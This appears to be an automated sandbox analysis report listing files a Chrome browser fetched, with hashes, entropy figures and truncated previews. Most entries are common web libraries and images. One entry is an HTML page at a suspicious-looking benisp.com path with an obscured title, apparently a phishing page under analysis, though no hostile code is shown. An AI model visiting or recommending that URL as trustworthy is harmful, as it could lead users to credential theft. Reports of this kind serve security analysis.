                                                                                                                                                                                                                                                Preview:!function(){"use strict";var n=function(n,t,e,i){var r,o;return function(u){t.value>=0&&(u||i)&&((o=t.value-(null!=r?r:0))||void 0===r)&&(r=t.value,t.delta=o,t.rating=function(n,t){return n>t[1]?"poor":n>t[0]?"needs-improvement":"good"}(t.value,e),n(t))}},t=-1,e=function(n){addEventListener("pageshow",(function(e){e.persisted&&(t=e.timeStamp,n(e))}),!0)},i=function(){var n=performance.getEntriesByType("navigation")[0];if(n&&n.responseStart>0&&n.responseStart<performance.now())return n},r=function(){var n,t=i();return null!==(n=null==t?void 0:t.activationStart)&&void 0!==n?n:0},o=function(n,e){void 0===e&&(e=-1);var o=i(),u="navigate";t>=0?u="back-forward-cache":o&&(document.prerendering||r()>0?u="prerender":document.wasDiscarded?u="restore":o.type&&(u=o.type.replace(/_/g,"-")));return{name:n,value:e,rating:"good",delta:0,entries:[],id:"v5-".concat(Date.now(),"-").concat(Math.floor(8999999999999*Math.random())+1e12),navigationType:u}},u=function(n){document.prerendering?addEventListener
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:PNG image data, 1 x 48, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                Size (bytes):61
                                                                                                                                                                                                                                                Entropy (8bit):4.035372245524405
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:yionv//thPlEPtlyDAkxl/k4E08up:6v/lhPiIDAk7Tp
                                                                                                                                                                                                                                                MD5:E098DA38F148395D12C0706E7AA334C1
                                                                                                                                                                                                                                                SHA1:5F3D4CBDCB4C5F91759F6AE4E101CE69C83B4224
                                                                                                                                                                                                                                                SHA-256:495B98E5D690FF6DB3F6576366C5DB476944974EF4CBEA9FF043CA380E735009
                                                                                                                                                                                                                                                SHA-512:B79A02DADC6D3E9AA26FB2BCB107ECEE27AD8CCB80E75BBA6E047824E085270627C9F6C7EF089E73F1EE399287309A57D9020787247176CFA2911C8F99F02A1C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8f50c3606cea43b9/1734709569716/Kz4N4jYqxFwMXYk
                                                                                                                                                                                                                                                Preview:.PNG........IHDR.......0....._Q......IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (47691)
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):47692
                                                                                                                                                                                                                                                Entropy (8bit):5.4016459163756165
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:768:IXCtQmIutwVHuzZBF6gmXLSOzQDjdxdOQbk6sgEvk/7b39tobLKZUanw81KZLGcD:IGJWHuzZBF6xbGfLsVvy33FUaDW
                                                                                                                                                                                                                                                MD5:9046FDD8B20F930F537279DEDE41E747
                                                                                                                                                                                                                                                SHA1:EBB905F60D71F45D056D42E6096736EA8C2D4BD9
                                                                                                                                                                                                                                                SHA-256:5AAC9E52F80011983676C03AD8120E0369E651E6357D0B05054026A3BC8EC32D
                                                                                                                                                                                                                                                SHA-512:F289C718B32D9E75E5725116D7696070C840426310B2A75E3EE66933E50B85BF738B4015FCFB8BAF7A8545B600B9820D85F8BB41C055FB0877C1420655E5E975
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (64966), with CRLF line terminators
                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                Size (bytes):353562
                                                                                                                                                                                                                                                Entropy (8bit):6.031200036435082
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:tODDORezIlikECAtwafzsCNU1W9gor53/OR7uxc6RrA8EvhIajS4qbVw7Tvow:tKORVmptw6sCGA9gsJ/OR7VRWeSpRJw
                                                                                                                                                                                                                                                MD5:996597E01B61FEF8AA40B12B1C0EFE8F
                                                                                                                                                                                                                                                SHA1:C81D5574A7EA92BFC0BCD74A60CE2691CAD2BE06
                                                                                                                                                                                                                                                SHA-256:A8DF4728491AA1C65863026669ED0D502B37A2BE0B454D2D074F207664417855
                                                                                                                                                                                                                                                SHA-512:601E893AB96272EF0D6969C01F2E1E8B858C3D7C50509B8529469398934EA83A2C5F9B970E5AD3F98791C803FB214C2A139DC9BF8CEFA9740C263D08F14A7820
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                URL:https://benisp.com/dan/dann/dannn
                                                                                                                                                                                                                                                Preview:..<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>****---***</title>.. <style>.. body {.. font-family: "Segoe UI", "Segoe UI Web (West European)", -apple-system, BlinkMacSystemFont, Roboto, "Helvetica Neue", sans-serif;.. background-color: #f4f4f4;.. margin: 0;.. display: flex;.. justify-content: center;.. align-items: center;.. height: 100vh;.. color: #333;.. background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABioAAALkCAYAAACRC231AAAgAElEQVR4Xuy9S8ttzbImdNa3T/0WL4ggNgQbNuzYsWPHI0qBKIJYIGhDBBvasKEdQbCj5aVU1EIoCrRQERVRwQIvUKKoICL+Dc/e25kZ8UQ8T2RkjjHnu9ba33rXfPf+1hwjR17iHpER4/Llr/t7//zv/+jw92Vcm//kQTnNy6Prl7g6x9GZz7A2Sp864ATc6VqDVYdot7a17fEwFL9YD+9mx972Ksw+bsLp/+SxNz0u/J4Q4es2/HEd6584q+gJf3fg08xYylf0UwJmhdGAEZAeJ3sQl9USrKPEfpD4u+HM5yofxvr4y0OT9UUHitCpjjUAT
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (20004), with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):20008
                                                                                                                                                                                                                                                Entropy (8bit):5.325887796778349
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:WT224ffKepaiTx1lkXnQgXRCwR/4RFbUE3aTb68Z2CX:EKaiT9kXnVXMwR/4RP3aTbtV
                                                                                                                                                                                                                                                MD5:B2060380F6B1A57A98E38C887407BF82
                                                                                                                                                                                                                                                SHA1:14C31CCAFF7A1E66484DE81B2643F946954EBE93
                                                                                                                                                                                                                                                SHA-256:B213A1CBB4E3271CA470EB7790AF362AC2E18CE468F8945952C7BD3456D2132E
                                                                                                                                                                                                                                                SHA-512:17A752799B3129302A443EDD261A993F7B658953690CE95F9CA5BA0034D2A0D10E0F851D9507BD95B9F48E656E1AF403C6FB92A1908603633020DD87FD6CA2DB
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Preview:!function(){"use strict";function t(r){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},t(r)}function r(r){var a=function(r,a){if("object"!=t(r)||!r)return r;var n=r[Symbol.toPrimitive];if(void 0!==n){var e=n.call(r,a||"default");if("object"!=t(e))return e;throw new TypeError("@@toPrimitive must return a primitive value.")}return("string"===a?String:Number)(r)}(r,"string");return"symbol"==t(a)?a:a+""}function a(t,a,n){return(a=r(a))in t?Object.defineProperty(t,a,{value:n,enumerable:!0,configurable:!0,writable:!0}):t[a]=n,t}var n={d:(t,r)=>{for(var a in r)n.o(r,a)&&!n.o(t,a)&&Object.defineProperty(t,a,{enumerable:!0,get:r[a]})},o:(t,r)=>Object.prototype.hasOwnProperty.call(t,r)},e={};n.d(e,{S:()=>_});var o,i={top:"paddingBottom",bottom:"paddingTop",left:"paddingRight",right:"paddingLeft"};function c(t,r,a){var n=void 0===a?{}:a
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 37648, version 1.0
                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                Size (bytes):37648
                                                                                                                                                                                                                                                Entropy (8bit):7.993900266292488
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:768:siQkVfmMWz8io5KC3McO7pwAczGLAxzAY2Mlqx7s6TUw7lIPaiN:vbVfrgC3Md7pIzIAVeMkhZTUw7ySiN
                                                                                                                                                                                                                                                MD5:AE4AB822AB7D2006B0F37D8BB7588311
                                                                                                                                                                                                                                                SHA1:A255DFEF28EC98B0758562651B7F0D58CEB6BDC4
                                                                                                                                                                                                                                                SHA-256:91182D2B3F182A89C05A362644278CD303F7751BD8093EF734976E1A83131C2C
                                                                                                                                                                                                                                                SHA-512:5CD83B198BE13824B9FB1240CDD5894A66929C7A10205FEBE8812A2441E2EF991981EC8BF5D68ABCF1CAC57BDC6D0923F998AA24B558B950C113F2BAE1A1AA2E
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                URL:https://fonts.wp.com/s/epilogue/v17/O4ZMFGj5hxF0EhjimngomvnCCtqb30OX1zTiCZXVigHPVA.woff2
                                                                                                                                                                                                                                                Preview:wOF2..............................................T...H....`?STATD..d...........r..6.$..N. .....w..[.y...blf...=...J.!..f+...N7ps.mh..n;..*.O...@l*]........"Y.f.kv.R....$H.p...,xir[...p(.1..2rL>.%.....+D..85-.....E.x..j...........A..}..t^...J......bf....^)".;^...6q.j..X...*...p.A.]..T.".>C.Oqk..F.w..n..a...!.W.N.....Qr.},3$.oG..H.. .._4....m}.Coy...A.!z?E....V.D..$....A..$.....clq..k...].....H........4.]).<..jQ...n...V...*..]\X.<.b....b..6.M.....I.o.-.`..&+.~.........*.?.c.=2..&.X.sX.d.:s...V..:...|...9....b}M.nm=^........?.$E.C.xO.qf.+...4.CT. E.\...hx.n..[..8s.I8....GtB...H....52B.C..2.#g.R...LQFi.;.Y...[.%......K.E.=....K..>..'jLx..]...m.1:@.0..uU$..r..Z..Mr._.N...F.$.KfP....:.EV3....&f..W.]....wC....Q..A..........d.KqX.,.EL...(..=x.m..>.1.`(..d.w/.D..".u..[..b:<...\.......H."ZP..0P.Q..67];...pU....m...j.BtY.6.9...m...-T..a.BU\8.}.o.@.a.B.h.uN5...jpn..J"4j...*x"N..GsjY....(7...".0I/.....l*.._&W.5Q.Sd...g.|rS....3.......:mZ.0<....l...Y.,..Sq......G".
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                Size (bytes):48316
                                                                                                                                                                                                                                                Entropy (8bit):5.6346993394709
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                                                                                                                                                MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                                                                                                                                SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                                                                                                                                SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                                                                                                                                SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                                                                                                                                                                                                Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (15771), with no line terminators
                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                Size (bytes):15773
                                                                                                                                                                                                                                                Entropy (8bit):4.941666446112814
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:q576FGrF9/WnOtNjsYwIMts++OTwFTWQTnT1q5fxSxRfu9Rb9yoLCDBtsFqAGj6c:OGFGkgWYwdqGJ0OO/hFrApRuYO+L8H
                                                                                                                                                                                                                                                MD5:F4752503860C258FED0EDF5A7D40DCB9
                                                                                                                                                                                                                                                SHA1:6E9D06488702A945DAF0A2AA03F58E18743E7B50
                                                                                                                                                                                                                                                SHA-256:5F3AE0CFA09B5D615295722CAE05096F88395B4BD8020260D7797CEA5E55B538
                                                                                                                                                                                                                                                SHA-512:EC99718E852473E3C7339A5D78A7DA10475AD78DC714D973F9FDB0ECDEBECFA5C5ECD9150C0BCAEBFFA37A50E78D84C0DAB30F1971BE861EF53B2492B8DE5E27
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                URL:https://s0.wp.com/wp-content/mu-plugins/actionbar/actionbar.css?v=20241015
                                                                                                                                                                                                                                                Preview:div#actionbar .no-display{display:none!important}div#actionbar *{box-sizing:border-box;outline:0;-webkit-tap-highlight-color:transparent;user-select:none;-webkit-user-select:none}div#actionbar{background:#fff;position:fixed;bottom:10px;right:10px;border:solid 1px #dcdcde;border-radius:3px;opacity:.98;height:35px;margin:0;padding:0;box-sizing:border-box;line-height:1;z-index:50000;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI","Roboto","Oxygen-Sans","Ubuntu","Cantarell","Helvetica Neue",sans-serif;-webkit-transform:translate3d(0,0,0);-moz-transform:translate3d(0,0,0);-o-transform:translate3d(0,0,0);-ms-transform:translate3d(0,0,0);transform:translate3d(0,0,0);transition:all .2s ease-in-out;-webkit-backface-visibility:hidden;-webkit-perspective:1000;-webkit-tap-highlight-color:transparent;user-select:none;-webkit-user-select:none}div#actionbar.actnbr-hidden{-webkit-transform:translate3d(0,150px,0);-moz-transform:translate3d(0,150px,0);-o-transform:translate3d(0,150px,0);-ms-tran
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (655), with no line terminators
                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                Size (bytes):655
                                                                                                                                                                                                                                                Entropy (8bit):5.055936985169239
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:2QH2AlXI0Mh3ZoBe1+s+XEKz4tW3DRRTW3u3XDdI+u/obPqRT86f:2QH/wNZoTZXCyRRa3u3X5duQbPqRJf
                                                                                                                                                                                                                                                MD5:5048B7BF6F335C259CAE5D653D50726E
                                                                                                                                                                                                                                                SHA1:96F45044F726EEF7C8E7C7F21F6368BF23A2B3F0
                                                                                                                                                                                                                                                SHA-256:B6E4492D3B8358A81B80908B1F84E6BD2F64A7A46D48793AF99D27BF29F4C2E8
                                                                                                                                                                                                                                                SHA-512:8990F24D3989C392C00A4FC59D78945A401EB3295FC287A2C718323CC83E27B2D403E9E08162B2CEF4F5C944B31D3EEE98560ACBB7BC4DC58B70B72AA83A4311
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                URL:https://s2.wp.com/wp-content/mu-plugins/gravatar-hovercards/wpgroho.js?m=1610363240i
                                                                                                                                                                                                                                                Preview:(function(){var e=window.WPGroHo||{};e.my_hash="";e.data={};e.renderers={};e.syncProfileData=function(a,r){if(!e.data[a]){e.data[a]={};var n=document.querySelectorAll("div.grofile-hash-map-"+a+" span");for(var t=0;t<n.length;t++){var o=n[t];e.data[a][o.className]=o.textContent}}e.appendProfileData(e.data[a],a,r)};e.appendProfileData=function(a,r,n){for(var t in a){if(typeof e.renderers[t]==="function"){return e.renderers[t](a[t],r,n,t)}var o=document.getElementById(n);if(o){var d=o.querySelector("h4");if(d){var i=document.createElement("p");i.className="grav-extra "+t;i.innerHTML=a[t];d.insertAdjacentElement("afterend",i)}}}};window.WPGroHo=e})();
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 6 x 5
                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                Size (bytes):50
                                                                                                                                                                                                                                                Entropy (8bit):3.8488255736198
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:CN+ltRPQEsJen2sSX:xvQEsJ42sSX
                                                                                                                                                                                                                                                MD5:E4D673A55C5656F19EF81563FB10884C
                                                                                                                                                                                                                                                SHA1:1F2D8ED221D39329251AD3A6FF1EDB20B7219443
                                                                                                                                                                                                                                                SHA-256:F3A8992ACB9AB911E0FA4AE12F4B85EF8E61008619F13EE51C7A121FF87F63B1
                                                                                                                                                                                                                                                SHA-512:E0B03411282A979CF772F700D9E5634B0C25C612E380AD33C0D59059B1B479D027016D5BEB148403EF185430DB35F5FAED362F36CE2C8ECAD0E6D8E30CEA97B4
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                URL:https://pixel.wp.com/g.gif?crypt=UE40eW5QN0p8M2Y%2FRE1mJVY3bm9aR3VCbS9mWm1pRyZuJS1LX1t5QmRXZzE3RC9rQWZHK1FjbDltdWdaMVFFZTcxUGVHLWR0WTJoL2xleFp%2BVXNmM3xVflA0X254PXM%2FJWhaPXRUUXFLanh%2BVUI2Zyt4fE56Y2xlV1EtXzhlTXEuQW5uNFYlWVZkbnpVckd1ZCwzJlNVQkNHWTRoRzJnZVJ6bC04ZlFJdnJLUnpUb2dBLTJKQmhHfEs2fCUvb112ZTZGcHw2S0FYLWljXURFcXxoTVdkT05jSzIvb3Z5OU1LOXxEUHpaK3J1&v=wpcom-no-pv&rand=0.2779972937038586
                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,............bx..j....;
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (6647)
                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                Size (bytes):6937
                                                                                                                                                                                                                                                Entropy (8bit):4.887471420875232
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:bVfQl4MaSxcdtATLEf1B+VVLCtoYQYH1g275qjzVgENt+7gYO5daS8wu0T6:blMaSxADeSAOqjz1YDOTZ8wuz
                                                                                                                                                                                                                                                MD5:E72CB023A1C5C1DDC89B99439F5EA1DC
                                                                                                                                                                                                                                                SHA1:FD3BF588946694B896863E1966AABCF80E016442
                                                                                                                                                                                                                                                SHA-256:14A1B12F8E8511BDC17A0F040248E069902C697794FAAB03CCB7C708550C1A7A
                                                                                                                                                                                                                                                SHA-512:062C93B09D2A73197ED7E977D42B0FB74DC691801FBC564968953674CB6A0EA5F4FFCE159C4D6F7170DB74D32B0F9438E2D0299A209DC422A8A9B2FCA93DD60C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                URL:https://0.gravatar.com/js/hovercards/hovercards.min.css?ver=202451b213a1cbb4e3271ca470eb7790af362ac2e18ce468f8945952c7bd3456d2132e
                                                                                                                                                                                                                                                Preview:.gravatar-hovercard{display:inline-block;z-index:10000000}.gravatar-hovercard h4,.gravatar-hovercard p{margin:0}.gravatar-hovercard a,.gravatar-hovercard i,.gravatar-hovercard p,.gravatar-hovercard span{color:#000;font-family:SF Pro Text,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:14px;line-height:1.5}.gravatar-hovercard .gravatar-hovercard__inner{background-color:#fff;border:1px solid #d8dbdd;border-radius:4px;box-shadow:0 2px 6px rgba(0,0,0,.08);box-sizing:border-box;display:flex;flex-direction:column;justify-content:space-between;min-height:273px;overflow:hidden;padding:24px 24px 16px;position:relative;width:336px}.gravatar-hovercard .gravatar-hovercard__header-image{height:75px;left:50%;position:absolute;top:0;transform:translateX(-50%);width:100%}.gravatar-hovercard .gravatar-hovercard__header{display:flex;flex-direction:column;gap:8px;z-index:1}.gravatar-hovercard .gravatar-hovercard__avatar-link,.gravatar-hove
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):61
                                                                                                                                                                                                                                                Entropy (8bit):3.990210155325004
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                                                                                                                                                MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                                                                                                                                                SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                                                                                                                                                SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                                                                                                                                                SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (40559), with no line terminators
                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                Size (bytes):40559
                                                                                                                                                                                                                                                Entropy (8bit):6.018275491120688
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:768:xrwcnP/R9Y+yXJAfC4wqDwQ8WeK+wQBzPgcDJxe2KUjT:9H/R9EZz4wgwQ8kQFaQ
                                                                                                                                                                                                                                                MD5:D13BDD42DB67AAE320A4AC67C1A5F562
                                                                                                                                                                                                                                                SHA1:C302E3FE57DB97D18F41060799C912B7A15B2861
                                                                                                                                                                                                                                                SHA-256:5A378EF6CE074C92C11F951803C83707B90E0970EB5EC2E1D6713AF9FDE36831
                                                                                                                                                                                                                                                SHA-512:0FE05EC3E5C9A7F84C637ED67D596A36549897F912CEFD78457B142448D178C095C6DE3A6705319FC1B7BDA8B3A896E662AD594B5DF7CF30A6EB2D3485790ED4
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                URL:https://s1.wp.com/_static/??-eJx9jcEOwjAMQ3+IEnUH2AXxLVuVlUDaVG2mib8ngAQDJG72S2zDUlyQrJgV0uwKz5FygyApGXJMFzTXvsjWyAYIsihZur3E87Dq1BMmayjzCBMuWKHplfHnbTVdcWSJJuNj923/hSKKYwmDkuQP4yYeqN6jx3Twe9/5Xd/77nwDsx1cLg==&cssminify=yes
                                                                                                                                                                                                                                                Preview:p.comment-likes{height:16px;float:none;width:100%;clear:both;display:block;margin-left:-2px}p.comment-not-liked{cursor:pointer}p.comment-likes a.view-likers{text-decoration:underline;border:none}div.comment-likes-overlay{color:#555;position:absolute;font-size:9pt;padding:0;margin:0;z-index:20000}div.comment-likes-overlay div.inner{background-color:#fff;border:1px solid #dfdfdf;border-color:rgba(0,0,0,.1);padding:8px;margin:0;max-width:310px;max-height:250px;overflow:hidden;-webkit-box-shadow:0 0 2px rgba(0,0,0,.15),0 3px 8px rgba(0,0,0,.1);-moz-box-shadow:0 0 2px rgba(0,0,0,.15),0 3px 8px rgba(0,0,0,.1);box-shadow:0 0 2px rgba(0,0,0,.15),0 3px 8px rgba(0,0,0,.1)}div.comment-likes-overlay div.inner a img{text-decoration:none;height:25px;width:25px;margin:2px 10px 2px 2px;vertical-align:middle}div.comment-likes-overlay div.inner ul{margin:0;padding:0}div.comment-likes-overlay div.inner ul li{float:left;display:inline;padding:0;margin:0 0 5px;overflow:hidden;white-space:nowrap;text-overfl
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 6 x 5
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):50
                                                                                                                                                                                                                                                Entropy (8bit):3.8488255736198
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:CN+ltRPQEsJen2sSX:xvQEsJ42sSX
                                                                                                                                                                                                                                                MD5:E4D673A55C5656F19EF81563FB10884C
                                                                                                                                                                                                                                                SHA1:1F2D8ED221D39329251AD3A6FF1EDB20B7219443
                                                                                                                                                                                                                                                SHA-256:F3A8992ACB9AB911E0FA4AE12F4B85EF8E61008619F13EE51C7A121FF87F63B1
                                                                                                                                                                                                                                                SHA-512:E0B03411282A979CF772F700D9E5634B0C25C612E380AD33C0D59059B1B479D027016D5BEB148403EF185430DB35F5FAED362F36CE2C8ECAD0E6D8E30CEA97B4
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,............bx..j....;
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                Size (bytes):89501
                                                                                                                                                                                                                                                Entropy (8bit):5.289893677458563
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                                                                                                                                MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                                                                                                                SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                                                                                                                SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                                                                                                                SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                URL:https://code.jquery.com/jquery-3.6.0.min.js
